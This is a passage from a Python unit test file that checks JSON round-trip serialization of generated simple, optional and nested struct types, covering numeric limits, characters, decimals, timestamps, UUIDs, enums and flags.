json = r'{"id":0,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543145597933463000,"f36":"00000000-0000-0000-0000-000000000000","f37":"e7854072-f0a5-11e8-8f69-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}}'
# Create a new struct from the source JSON string
struct1 = test.StructSimple.from_json(json)
# Serialize the struct to the JSON string
json = struct1.to_json()
# Check the serialized JSON size
self.assertGreater(len(json), 0)
# Deserialize the struct from the JSON string
struct2 = test.StructSimple.from_json(json)
self.assertEqual(struct2.f1, False)
self.assertEqual(struct2.f2, True)
self.assertEqual(struct2.f3, 0)
self.assertEqual(struct2.f4, 0xFF)
self.assertEqual(struct2.f5, '\0')
self.assertEqual(struct2.f6, '!')
self.assertEqual(struct2.f7, chr(0))
self.assertEqual(struct2.f8, chr(0x0444))
self.assertEqual(struct2.f9, 0)
self.assertEqual(struct2.f10, 127)
self.assertEqual(struct2.f11, 0)
self.assertEqual(struct2.f12, 0xFF)
self.assertEqual(struct2.f13, 0)
self.assertEqual(struct2.f14, 32767)
self.assertEqual(struct2.f15, 0)
self.assertEqual(struct2.f16, 0xFFFF)
self.assertEqual(struct2.f17, 0)
self.assertEqual(struct2.f18, 2147483647)
self.assertEqual(struct2.f19, 0)
self.assertEqual(struct2.f20, 0xFFFFFFFF)
self.assertEqual(struct2.f21, 0)
self.assertEqual(struct2.f22, 9223372036854775807)
self.assertEqual(struct2.f23, 0)
self.assertEqual(struct2.f24, 0xFFFFFFFFFFFFFFFF)
self.assertEqual(struct2.f25, 0.0)
self.assertLess(abs(struct2.f26 - 123.456), 0.0001)
self.assertEqual(struct2.f27, 0.0)
self.assertLess(abs(struct2.f28 - -123.567e+123), 1e+123)
self.assertEqual(struct2.f29, decimal.Decimal("0"))
self.assertEqual(struct2.f30, decimal.Decimal("123456.123456"))
self.assertEqual(struct2.f31, "")
self.assertEqual(struct2.f32, "Initial string!")
self.assertEqual(datetime.datetime.utcfromtimestamp(struct2.f33 / 1000000000), datetime.datetime(1970, 1, 1))
self.assertEqual(datetime.datetime.utcfromtimestamp(struct2.f34 / 1000000000), datetime.datetime(1970, 1, 1))
self.assertGreater(datetime.datetime.utcfromtimestamp(struct2.f35 / 1000000000), datetime.datetime(2018, 1, 1))
self.assertEqual(struct2.f36, uuid.UUID(int=0))
self.assertNotEqual(struct2.f37, uuid.UUID(int=0))
self.assertEqual(struct2.f38, uuid.UUID("123e4567-e89b-12d3-a456-426655440000"))
self.assertEqual(struct2.f1, struct1.f1)
self.assertEqual(struct2.f2, struct1.f2)
self.assertEqual(struct2.f3, struct1.f3)
self.assertEqual(struct2.f4, struct1.f4)
self.assertEqual(struct2.f5, struct1.f5)
self.assertEqual(struct2.f6, struct1.f6)
self.assertEqual(struct2.f7, struct1.f7)
self.assertEqual(struct2.f8, struct1.f8)
self.assertEqual(struct2.f9, struct1.f9)
self.assertEqual(struct2.f10, struct1.f10)
self.assertEqual(struct2.f11, struct1.f11)
self.assertEqual(struct2.f12, struct1.f12)
self.assertEqual(struct2.f13, struct1.f13)
self.assertEqual(struct2.f14, struct1.f14)
self.assertEqual(struct2.f15, struct1.f15)
self.assertEqual(struct2.f16, struct1.f16)
self.assertEqual(struct2.f17, struct1.f17)
self.assertEqual(struct2.f18, struct1.f18)
self.assertEqual(struct2.f19, struct1.f19)
self.assertEqual(struct2.f20, struct1.f20)
self.assertEqual(struct2.f21, struct1.f21)
self.assertEqual(struct2.f22, struct1.f22)
self.assertEqual(struct2.f23, struct1.f23)
self.assertEqual(struct2.f24, struct1.f24)
self.assertEqual(struct2.f25, struct1.f25)
self.assertLess(abs(struct2.f26 - struct1.f26), 0.0001)
self.assertEqual(struct2.f27, struct1.f27)
self.assertLess(abs(struct2.f28 - struct1.f28), 1e+123)
self.assertEqual(struct2.f29, struct1.f29)
self.assertEqual(struct2.f30, struct1.f30)
self.assertEqual(struct2.f31, struct1.f31)
self.assertEqual(struct2.f32, struct1.f32)
self.assertEqual(struct2.f33, struct1.f33)
self.assertEqual(struct2.f34, struct1.f34)
self.assertEqual(struct2.f35, struct1.f35)
self.assertEqual(struct2.f36, struct1.f36)
self.assertEqual(struct2.f37, struct1.f37)
self.assertEqual(struct2.f38, struct1.f38)
self.assertEqual(struct2.f39, struct1.f39)
self.assertEqual(struct2.f40, struct1.f40)
def test_serialization_json_struct_optional(self):
# Define a source JSON string
json = r'{"id":0,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543145860677797000,"f36":"00000000-0000-0000-0000-000000000000","f37":"8420d1c6-f0a6-11e8-80fc-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]},"f100":null,"f101":true,"f102":null,"f103":null,"f104":255,"f105":null,"f106":null,"f107":33,"f108":null,"f109":null,"f110":1092,"f111":null,"f112":null,"f113":127,"f114":null,"f115":null,"f116":255,"f117":null,"f118":null,"f119":32767,"f120":null,"f121":null,"f122":65535,"f123":null,"f124":null,"f125":2147483647,"f126":null,"f127":null,"f128":4294967295,"f129":null,"f130":null,"f131":9223372036854775807,"f132":null,"f133":null,"f134":18446744073709551615,"f135":null,"f136":null,"f137":123.456,"f138":null,"f139":null,"f140":-1.23456e+125,"f141":null,"f142":null,"f143":"123456.123456","f144":null,"f145":null,"f146":"Initial string!","f147":null,"f148":null,"f149":1543145860678429000,"f150":null,"f151":null,"f152":"123e4567-e89b-12d3-a456-426655440000","f153":null,"f154":null,"f155":null,"f156":null,"f157":null,"f158":null,"f159":null,"f160":null,"f161":null,"f162":null,"f163":null,"f164":null,"f165":null}'
# Create a new struct from the source JSON string
struct1 = test.StructOptional.from_json(json)
# Serialize the struct to the JSON string
json = struct1.to_json()
# Check the serialized JSON size
self.assertGreater(len(json), 0)
# Deserialize the struct from the JSON string
struct2 = test.StructOptional.from_json(json)
self.assertEqual(struct2.f1, False)
self.assertEqual(struct2.f2, True)
self.assertEqual(struct2.f3, 0)
self.assertEqual(struct2.f4, 0xFF)
self.assertEqual(struct2.f5, '\0')
self.assertEqual(struct2.f6, '!')
self.assertEqual(struct2.f7, chr(0))
self.assertEqual(struct2.f8, chr(0x0444))
self.assertEqual(struct2.f9, 0)
self.assertEqual(struct2.f10, 127)
self.assertEqual(struct2.f11, 0)
self.assertEqual(struct2.f12, 0xFF)
self.assertEqual(struct2.f13, 0)
self.assertEqual(struct2.f14, 32767)
self.assertEqual(struct2.f15, 0)
self.assertEqual(struct2.f16, 0xFFFF)
self.assertEqual(struct2.f17, 0)
self.assertEqual(struct2.f18, 2147483647)
self.assertEqual(struct2.f19, 0)
self.assertEqual(struct2.f20, 0xFFFFFFFF)
self.assertEqual(struct2.f21, 0)
self.assertEqual(struct2.f22, 9223372036854775807)
self.assertEqual(struct2.f23, 0)
self.assertEqual(struct2.f24, 0xFFFFFFFFFFFFFFFF)
self.assertEqual(struct2.f25, 0.0)
self.assertLess(abs(struct2.f26 - 123.456), 0.0001)
self.assertEqual(struct2.f27, 0.0)
self.assertLess(abs(struct2.f28 - -123.567e+123), 1e+123)
self.assertEqual(struct2.f29, decimal.Decimal("0"))
self.assertEqual(struct2.f30, decimal.Decimal("123456.123456"))
self.assertEqual(struct2.f31, "")
self.assertEqual(struct2.f32, "Initial string!")
self.assertEqual(datetime.datetime.utcfromtimestamp(struct2.f33 / 1000000000), datetime.datetime(1970, 1, 1))
self.assertEqual(datetime.datetime.utcfromtimestamp(struct2.f34 / 1000000000), datetime.datetime(1970, 1, 1))
self.assertGreater(datetime.datetime.utcfromtimestamp(struct2.f35 / 1000000000), datetime.datetime(2018, 1, 1))
self.assertEqual(struct2.f36, uuid.UUID(int=0))
self.assertNotEqual(struct2.f37, uuid.UUID(int=0))
self.assertEqual(struct2.f38, uuid.UUID("123e4567-e89b-12d3-a456-426655440000"))
self.assertEqual(struct2.f100, None)
self.assertNotEqual(struct2.f101, None)
self.assertEqual(struct2.f101, True)
self.assertEqual(struct2.f102, None)
self.assertEqual(struct2.f103, None)
self.assertNotEqual(struct2.f104, None)
self.assertEqual(struct2.f104, 0xFF)
self.assertEqual(struct2.f105, None)
self.assertEqual(struct2.f106, None)
self.assertNotEqual(struct2.f107, None)
self.assertEqual(struct2.f107, '!')
self.assertEqual(struct2.f108, None)
self.assertEqual(struct2.f109, None)
self.assertNotEqual(struct2.f110, None)
self.assertEqual(struct2.f110, chr(0x0444))
self.assertEqual(struct2.f111, None)
self.assertEqual(struct2.f112, None)
self.assertNotEqual(struct2.f113, None)
self.assertEqual(struct2.f113, 127)
self.assertEqual(struct2.f114, None)
self.assertEqual(struct2.f115, None)
self.assertNotEqual(struct2.f116, None)
self.assertEqual(struct2.f116, 0xFF)
self.assertEqual(struct2.f117, None)
self.assertEqual(struct2.f118, None)
self.assertNotEqual(struct2.f119, None)
self.assertEqual(struct2.f119, 32767)
self.assertEqual(struct2.f120, None)
self.assertEqual(struct2.f121, None)
self.assertNotEqual(struct2.f122, None)
self.assertEqual(struct2.f122, 0xFFFF)
self.assertEqual(struct2.f123, None)
self.assertEqual(struct2.f124, None)
self.assertNotEqual(struct2.f125, None)
self.assertEqual(struct2.f125, 2147483647)
self.assertEqual(struct2.f126, None)
self.assertEqual(struct2.f127, None)
self.assertNotEqual(struct2.f128, None)
self.assertEqual(struct2.f128, 0xFFFFFFFF)
self.assertEqual(struct2.f129, None)
self.assertEqual(struct2.f130, None)
self.assertNotEqual(struct2.f131, None)
self.assertEqual(struct2.f131, 9223372036854775807)
self.assertEqual(struct2.f132, None)
self.assertEqual(struct2.f133, None)
self.assertNotEqual(struct2.f131, None)
self.assertEqual(struct2.f134, 0xFFFFFFFFFFFFFFFF)
self.assertEqual(struct2.f135, None)
self.assertEqual(struct2.f136, None)
self.assertNotEqual(struct2.f137, None)
self.assertLess(abs(struct2.f137 - 123.456), 0.0001)
self.assertEqual(struct2.f138, None)
self.assertEqual(struct2.f139, None)
self.assertNotEqual(struct2.f140, None)
self.assertLess(abs(struct2.f140 - -123.567e+123), 1e+123)
self.assertEqual(struct2.f141, None)
self.assertEqual(struct2.f142, None)
self.assertNotEqual(struct2.f143, None)
self.assertEqual(struct2.f143, decimal.Decimal("123456.123456"))
self.assertEqual(struct2.f144, None)
self.assertEqual(struct2.f145, None)
self.assertNotEqual(struct2.f146, None)
self.assertEqual(struct2.f146, "Initial string!")
self.assertEqual(struct2.f147, None)
self.assertEqual(struct2.f148, None)
self.assertNotEqual(struct2.f149, None)
self.assertGreater(datetime.datetime.utcfromtimestamp(struct2.f149 / 1000000000), datetime.datetime(2018, 1, 1))
self.assertEqual(struct2.f150, None)
self.assertEqual(struct2.f151, None)
self.assertNotEqual(struct2.f152, None)
self.assertEqual(struct2.f152, uuid.UUID("123e4567-e89b-12d3-a456-426655440000"))
self.assertEqual(struct2.f153, None)
self.assertEqual(struct2.f154, None)
self.assertEqual(struct2.f155, None)
self.assertEqual(struct2.f156, None)
self.assertEqual(struct2.f157, None)
self.assertEqual(struct2.f158, None)
self.assertEqual(struct2.f159, None)
self.assertEqual(struct2.f160, None)
self.assertEqual(struct2.f161, None)
self.assertEqual(struct2.f162, None)
self.assertEqual(struct2.f163, None)
self.assertEqual(struct2.f164, None)
self.assertEqual(struct2.f165, None)
self.assertEqual(struct2.f1, struct1.f1)
self.assertEqual(struct2.f2, struct1.f2)
self.assertEqual(struct2.f3, struct1.f3)
self.assertEqual(struct2.f4, struct1.f4)
self.assertEqual(struct2.f5, struct1.f5)
self.assertEqual(struct2.f6, struct1.f6)
self.assertEqual(struct2.f7, struct1.f7)
self.assertEqual(struct2.f8, struct1.f8)
self.assertEqual(struct2.f9, struct1.f9)
self.assertEqual(struct2.f10, struct1.f10)
self.assertEqual(struct2.f11, struct1.f11)
self.assertEqual(struct2.f12, struct1.f12)
self.assertEqual(struct2.f13, struct1.f13)
self.assertEqual(struct2.f14, struct1.f14)
self.assertEqual(struct2.f15, struct1.f15)
self.assertEqual(struct2.f16, struct1.f16)
self.assertEqual(struct2.f17, struct1.f17)
self.assertEqual(struct2.f18, struct1.f18)
self.assertEqual(struct2.f19, struct1.f19)
self.assertEqual(struct2.f20, struct1.f20)
self.assertEqual(struct2.f21, struct1.f21)
self.assertEqual(struct2.f22, struct1.f22)
self.assertEqual(struct2.f23, struct1.f23)
self.assertEqual(struct2.f24, struct1.f24)
self.assertEqual(struct2.f25, struct1.f25)
self.assertLess(abs(struct2.f26 - struct1.f26), 0.0001)
self.assertEqual(struct2.f27, struct1.f27)
self.assertLess(abs(struct2.f28 - struct1.f28), 1e+123)
self.assertEqual(struct2.f29, struct1.f29)
self.assertEqual(struct2.f30, struct1.f30)
self.assertEqual(struct2.f31, struct1.f31)
self.assertEqual(struct2.f32, struct1.f32)
self.assertEqual(struct2.f33, struct1.f33)
self.assertEqual(struct2.f34, struct1.f34)
self.assertEqual(struct2.f35, struct1.f35)
self.assertEqual(struct2.f36, struct1.f36)
self.assertEqual(struct2.f37, struct1.f37)
self.assertEqual(struct2.f100, struct1.f100)
self.assertEqual(struct2.f101, struct1.f101)
self.assertEqual(struct2.f102, struct1.f102)
self.assertEqual(struct2.f103, struct1.f103)
self.assertEqual(struct2.f104, struct1.f104)
self.assertEqual(struct2.f105, struct1.f105)
self.assertEqual(struct2.f106, struct1.f106)
self.assertEqual(struct2.f107, struct1.f107)
self.assertEqual(struct2.f108, struct1.f108)
self.assertEqual(struct2.f109, struct1.f109)
self.assertEqual(struct2.f110, struct1.f110)
self.assertEqual(struct2.f111, struct1.f111)
self.assertEqual(struct2.f112, struct1.f112)
self.assertEqual(struct2.f113, struct1.f113)
self.assertEqual(struct2.f114, struct1.f114)
self.assertEqual(struct2.f115, struct1.f115)
self.assertEqual(struct2.f116, struct1.f116)
self.assertEqual(struct2.f117, struct1.f117)
self.assertEqual(struct2.f118, struct1.f118)
self.assertEqual(struct2.f119, struct1.f119)
self.assertEqual(struct2.f120, struct1.f120)
self.assertEqual(struct2.f121, struct1.f121)
self.assertEqual(struct2.f122, struct1.f122)
self.assertEqual(struct2.f123, struct1.f123)
self.assertEqual(struct2.f124, struct1.f124)
self.assertEqual(struct2.f125, struct1.f125)
self.assertEqual(struct2.f126, struct1.f126)
self.assertEqual(struct2.f127, struct1.f127)
self.assertEqual(struct2.f128, struct1.f128)
self.assertEqual(struct2.f129, struct1.f129)
self.assertEqual(struct2.f130, struct1.f130)
self.assertEqual(struct2.f131, struct1.f131)
self.assertEqual(struct2.f132, struct1.f132)
self.assertEqual(struct2.f133, struct1.f133)
self.assertEqual(struct2.f134, struct1.f134)
self.assertEqual(struct2.f135, struct1.f135)
self.assertEqual(struct2.f136, struct1.f136)
self.assertLess(abs(struct2.f137 - struct1.f137), 0.0001)
self.assertEqual(struct2.f138, struct1.f138)
self.assertEqual(struct2.f139, struct1.f139)
self.assertLess(abs(struct2.f140 - struct1.f140), 1e+123)
self.assertEqual(struct2.f141, struct1.f141)
self.assertEqual(struct2.f142, struct1.f142)
self.assertEqual(struct2.f143, struct1.f143)
self.assertEqual(struct2.f144, struct1.f144)
self.assertEqual(struct2.f145, struct1.f145)
self.assertEqual(struct2.f146, struct1.f146)
self.assertEqual(struct2.f147, struct1.f147)
self.assertEqual(struct2.f148, struct1.f148)
self.assertEqual(struct2.f149, struct1.f149)
self.assertEqual(struct2.f150, struct1.f150)
self.assertEqual(struct2.f151, struct1.f151)
self.assertEqual(struct2.f152, struct1.f152)
self.assertEqual(struct2.f153, struct1.f153)
self.assertEqual(struct2.f154, struct1.f154)
self.assertEqual(struct2.f155, struct1.f155)
self.assertEqual(struct2.f156, struct1.f156)
self.assertEqual(struct2.f157, struct1.f157)
def test_serialization_json_struct_nested(self):
# Define a source JSON string
json = r'{"id":0,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543145901646321000,"f36":"00000000-0000-0000-0000-000000000000","f37":"9c8c268e-f0a6-11e8-a777-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]},"f100":null,"f101":true,"f102":null,"f103":null,"f104":255,"f105":null,"f106":null,"f107":33,"f108":null,"f109":null,"f110":1092,"f111":null,"f112":null,"f113":127,"f114":null,"f115":null,"f116":255,"f117":null,"f118":null,"f119":32767,"f120":null,"f121":null,"f122":65535,"f123":null,"f124":null,"f125":2147483647,"f126":null,"f127":null,"f128":4294967295,"f129":null,"f130":null,"f131":9223372036854775807,"f132":null,"f133":null,"f134":18446744073709551615,"f135":null,"f136":null,"f137":123.456,"f138":null,"f139":null,"f140":-1.23456e+125,"f141":null,"f142":null,"f143":"123456.123456","f144":null,"f145":null,"f146":"Initial string!","f147":null,"f148":null,"f149":1543145901647155000,"f150":null,"f151":null,"f152":"123e4567-e89b-12d3-a456-426655440000","f153":null,"f154":null,"f155":null,"f156":null,"f157":null,"f158":null,"f159":null,"f160":null,"f161":null,"f162":null,"f163":null,"f164":null,"f165":null,"f1000":0,"f1001":null,"f1002":50,"f1003":null,"f1004":0,"f1005":null,"f1006":42,"f1007":null,"f1008":{"id":0,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543145901647367000,"f36":"00000000-0000-0000-0000-000000000000","f37":"9c8c54c4-f0a6-11e8-a777-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}},"f1009":null,"f1010":{"id":0,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543145901648310000,"f36":"00000000-0000-0000-0000-000000000000","f37":"9c8c6b76-f0a6-11e8-a777-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]},"f100":null,"f101":true,"f102":null,"f103":null,"f104":255,"f105":null,"f106":null,"f107":33,"f108":null,"f109":null,"f110":1092,"f111":null,"f112":null,"f113":127,"f114":null,"f115":null,"f116":255,"f117":null,"f118":null,"f119":32767,"f120":null,"f121":null,"f122":65535,"f123":null,"f124":null,"f125":2147483647,"f126":null,"f127":null,"f128":4294967295,"f129":null,"f130":null,"f131":9223372036854775807,"f132":null,"f133":null,"f134":18446744073709551615,"f135":null,"f136":null,"f137":123.456,"f138":null,"f139":null,"f140":-1.23456e+125,"f141":null,"f142":null,"f143":"123456.123456","f144":null,"f145":null,"f146":"Initial string!","f147":null,"f148":null,"f149":1543145901648871000,"f150":null,"f151":null,"f152":"123e4567-e89b-12d3-a456-426655440000","f153":null,"f154":null,"f155":null,"f156":null,"f157":null,"f158":null,"f159":null,"f160":null,"f161":null,"f162":null,"f163":null,"f164":null,"f165":null},"f1011":null}'
# Create a new struct from the source JSON string
struct1 = test.StructNested.from_json(json)
# Serialize the struct to the JSON string
json = struct1.to_json()
# Check the serialized JSON size
self.assertGreater(len(json), 0)
# Deserialize the struct from the JSON string
struct2 = test.StructNested.from_json(json)
self.assertEqual(struct2.f1, False)
self.assertEqual(struct2.f2, True)
self.assertEqual(struct2.f3, 0)
self.assertEqual(struct2.f4, 0xFF)
self.assertEqual(struct2.f5, '\0')
self.assertEqual(struct2.f6, '!')
self.assertEqual(struct2.f7, chr(0))
self.assertEqual(struct2.f8, chr(0x0444))
self.assertEqual(struct2.f9, 0)
self.assertEqual(struct2.f10, 127)
self.assertEqual(struct2.f11, 0)
self.assertEqual(struct2.f12, 0xFF)
self.assertEqual(struct2.f13, 0)
self.assertEqual(struct2.f14, 32767)
self.assertEqual(struct2.f15, 0)
self.assertEqual(struct2.f16, 0xFFFF)
self.assertEqual(struct2.f17, 0)
self.assertEqual(struct2.f18, 2147483647)
self.assertEqual(struct2.f19, 0)
self.assertEqual(struct2.f20, 0xFFFFFFFF)
self.assertEqual(struct2.f21, 0)
self.assertEqual(struct2.f22, 9223372036854775807)
self.assertEqual(struct2.f23, 0)
self.assertEqual(struct2.f24, 0xFFFFFFFFFFFFFFFF)
self.assertEqual(struct2.f25, 0.0)
self.assertLess(abs(struct2.f26 - 123.456), 0.0001)
self.assertEqual(struct2.f27, 0.0)
self.assertLess(abs(struct2.f28 - -123.567e+123), 1e+123)
self.assertEqual(struct2.f29, decimal.Decimal("0"))
self.assertEqual(struct2.f30, decimal.Decimal("123456.123456"))
self.assertEqual(struct2.f31, "")
self.assertEqual(struct2.f32, "Initial string!")
self.assertEqual(datetime.datetime.utcfromtimestamp(struct2.f33 / 1000000000), datetime.datetime(1970, 1, 1))
self.assertEqual(datetime.datetime.utcfromtimestamp(struct2.f34 / 1000000000), datetime.datetime(1970, 1, 1))
self.assertGreater(datetime.datetime.utcfromtimestamp(struct2.f35 / 1000000000), datetime.datetime(2018, 1, 1))
self.assertEqual(struct2.f36, uuid.UUID(int=0))
self.assertNotEqual(struct2.f37, uuid.UUID(int=0))
self.assertEqual(struct2.f38, uuid.UUID("123e4567-e89b-12d3-a456-426655440000"))
self.assertEqual(struct2.f100, None)
self.assertNotEqual(struct2.f101, None)
self.assertEqual(struct2.f101, True)
self.assertEqual(struct2.f102, None)
self.assertEqual(struct2.f103, None)
self.assertNotEqual(struct2.f104, None)
self.assertEqual(struct2.f104, 0xFF)
self.assertEqual(struct2.f105, None)
self.assertEqual(struct2.f106, None)
self.assertNotEqual(struct2.f107, None)
self.assertEqual(struct2.f107, '!')
self.assertEqual(struct2.f108, None)
self.assertEqual(struct2.f109, None)
self.assertNotEqual(struct2.f110, None)
self.assertEqual(struct2.f110, chr(0x0444))
self.assertEqual(struct2.f111, None)
self.assertEqual(struct2.f112, None)
self.assertNotEqual(struct2.f113, None)
self.assertEqual(struct2.f113, 127)
self.assertEqual(struct2.f114, None)
self.assertEqual(struct2.f115, None)
self.assertNotEqual(struct2.f116, None)
self.assertEqual(struct2.f116, 0xFF)
self.assertEqual(struct2.f117, None)
self.assertEqual(struct2.f118, None)
self.assertNotEqual(struct2.f119, None)
self.assertEqual(struct2.f119, 32767)
self.assertEqual(struct2.f120, None)
self.assertEqual(struct2.f121, None)
self.assertNotEqual(struct2.f122, None)
self.assertEqual(struct2.f122, 0xFFFF)
self.assertEqual(struct2.f123, None)
self.assertEqual(struct2.f124, None)
self.assertNotEqual(struct2.f125, None)
self.assertEqual(struct2.f125, 2147483647)
self.assertEqual(struct2.f126, None)
self.assertEqual(struct2.f127, None)
self.assertNotEqual(struct2.f128, None)
self.assertEqual(struct2.f128, 0xFFFFFFFF)
self.assertEqual(struct2.f129, None)
self.assertEqual(struct2.f130, None)
self.assertNotEqual(struct2.f131, None)
self.assertEqual(struct2.f131, 9223372036854775807)
self.assertEqual(struct2.f132, None)
self.assertEqual(struct2.f133, None)
self.assertNotEqual(struct2.f131, None)
self.assertEqual(struct2.f134, 0xFFFFFFFFFFFFFFFF)
self.assertEqual(struct2.f135, None)
self.assertEqual(struct2.f136, None)
self.assertNotEqual(struct2.f137, None)
self.assertLess(abs(struct2.f137 - 123.456), 0.0001)
self.assertEqual(struct2.f138, None)
self.assertEqual(struct2.f139, None)
self.assertNotEqual(struct2.f140, None)
self.assertLess(abs(struct2.f140 - -123.567e+123), 1e+123)
self.assertEqual(struct2.f141, None)
self.assertEqual(struct2.f142, None)
self.assertNotEqual(struct2.f143, None)
self.assertEqual(struct2.f143, decimal.Decimal("123456.123456"))
self.assertEqual(struct2.f144, None)
self.assertEqual(struct2.f145, None)
self.assertNotEqual(struct2.f146, None)
self.assertEqual(struct2.f146, "Initial string!")
self.assertEqual(struct2.f147, None)
self.assertEqual(struct2.f148, None)
self.assertNotEqual(struct2.f149, None)
self.assertGreater(datetime.datetime.utcfromtimestamp(struct2.f149 / 1000000000), datetime.datetime(2018, 1, 1))
self.assertEqual(struct2.f150, None)
self.assertEqual(struct2.f151, None)
self.assertNotEqual(struct2.f152, None)
self.assertEqual(struct2.f152, uuid.UUID("123e4567-e89b-12d3-a456-426655440000"))
self.assertEqual(struct2.f153, None)
self.assertEqual(struct2.f154, None)
self.assertEqual(struct2.f155, None)
self.assertEqual(struct2.f156, None)
self.assertEqual(struct2.f157, None)
self.assertEqual(struct2.f158, None)
self.assertEqual(struct2.f159, None)
self.assertEqual(struct2.f160, None)
self.assertEqual(struct2.f161, None)
self.assertEqual(struct2.f162, None)
self.assertEqual(struct2.f163, None)
self.assertEqual(struct2.f164, None)
self.assertEqual(struct2.f165, None)
self.assertEqual(struct2.f1000, test.EnumSimple.ENUM_VALUE_0)
self.assertEqual(struct2.f1001, None)
self.assertEqual(struct2.f1002, test.EnumTyped.ENUM_VALUE_2)
self.assertEqual(struct2.f1003, None)
self.assertEqual(struct2.f1004, test.FlagsSimple.FLAG_VALUE_0)
self.assertEqual(struct2.f1005, None)
self.assertEqual(struct2.f1006, test.FlagsTyped.FLAG_VALUE_2 | test.FlagsTyped.FLAG_VALUE_4 | test.FlagsTyped.FLAG_VALUE_6)
self.assertEqual(struct2.f1007, None)
self.assertEqual(struct2.f1009, None)
self.assertEqual(struct2.f1011, None)
self.assertEqual(struct2.f1, struct1.f1)
self.assertEqual(struct2.f2, struct1.f2)
self.assertEqual(struct2.f3, struct1.f3)
self.assertEqual(struct2.f4, struct1.f4)
self.assertEqual(struct2.f5, struct1.f5)
self.assertEqual(struct2.f6, struct1.f6)
self.assertEqual(struct2.f7, struct1.f7)
self.assertEqual(struct2.f8, struct1.f8)
self.assertEqual(struct2.f9, struct1.f9)
self.assertEqual(struct2.f10, struct1.f10)
self.assertEqual(struct2.f11, struct1.f11)
self.assertEqual(struct2.f12, struct1.f12)
self.assertEqual(struct2.f13, struct1.f13)
self.assertEqual(struct2.f14, struct1.f14)
self.assertEqual(struct2.f15, struct1.f15)
self.assertEqual(struct2.f16, struct1.f16)
self.assertEqual(struct2.f17, struct1.f17)
self.assertEqual(struct2.f18, struct1.f18)
self.assertEqual(struct2.f19, struct1.f19)
self.assertEqual(struct2.f20, struct1.f20)
self.assertEqual(struct2.f21, struct1.f21)
self.assertEqual(struct2.f22, struct1.f22)
self.assertEqual(struct2.f23, struct1.f23)
self.assertEqual(struct2.f24, struct1.f24)
self.assertEqual(struct2.f25, struct1.f25)
self.assertLess(abs(struct2.f26 - struct1.f26), 0.0001)
self.assertEqual(struct2.f27, struct1.f27)
self.assertLess(abs(struct2.f28 - struct2.f28), 1e+123)
self.assertEqual(struct2.f29, struct1.f29)
self.assertEqual(struct2.f30, struct1.f30)
self.assertEqual(struct2.f31, struct1.f31)
self.assertEqual(struct2.f32, struct1.f32)
self.assertEqual(struct2.f33, struct1.f33)
self.assertEqual(struct2.f34, struct1.f34)
